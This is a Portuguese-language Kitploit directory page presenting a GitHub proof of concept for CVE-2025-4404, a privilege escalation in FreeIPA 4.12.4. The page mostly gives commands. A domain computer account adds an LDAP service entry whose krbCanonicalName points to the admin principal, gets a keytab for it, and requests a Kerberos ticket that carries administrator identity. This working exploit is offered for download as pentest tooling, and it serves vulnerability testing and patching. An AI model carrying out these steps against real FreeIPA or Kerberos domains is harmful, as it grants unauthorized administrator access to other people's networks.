Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4404-POC — POC for CVE-2025-4404 | Kitploit
Ferramentas/GitHubGitHub/im10n/cve-2025-4404-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingAuthentication
GitHubim10n/cve-2025-4404-poc

CVE-2025-4404-POC

POC for CVE-2025-4404

Ver Repositório
6há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-4404 POC

POC para CVE-2025-4404

Se você possui uma conta de computador no domínio (host/pc1.[email protected]), então pode adicionar o serviço por padrão. E você pode definir krbPrincipalName e krbCanonicalName. Por padrão, o valor do atributo krbCanonicalName está ausente para a conta de administrador do FreeIPA 4.12.4. Você pode solicitar um ticket Kerberos com o valor de krbPrincipalName, mas o ticket conterá o valor de krbCanonicalName.

Vamos lá

  1. Primeiro, solicitaremos um ticket em nome da conta do computador: $ kinit host/[email protected] -k -t /etc/krb5.keytab

  2. Adicionar conta de serviço ao LDAP:

root@kitploit:~
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
  1. Solicitar keytab
root@kitploit:~
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
  1. Solicitar ticket $ kinit --no-request-pac -k -t ./test.keytab test/[email protected]

PWN!!!

Você pode verificar o ticket com: ldapwhoami -H ldap://dc1.test.local

Baixar ferramenta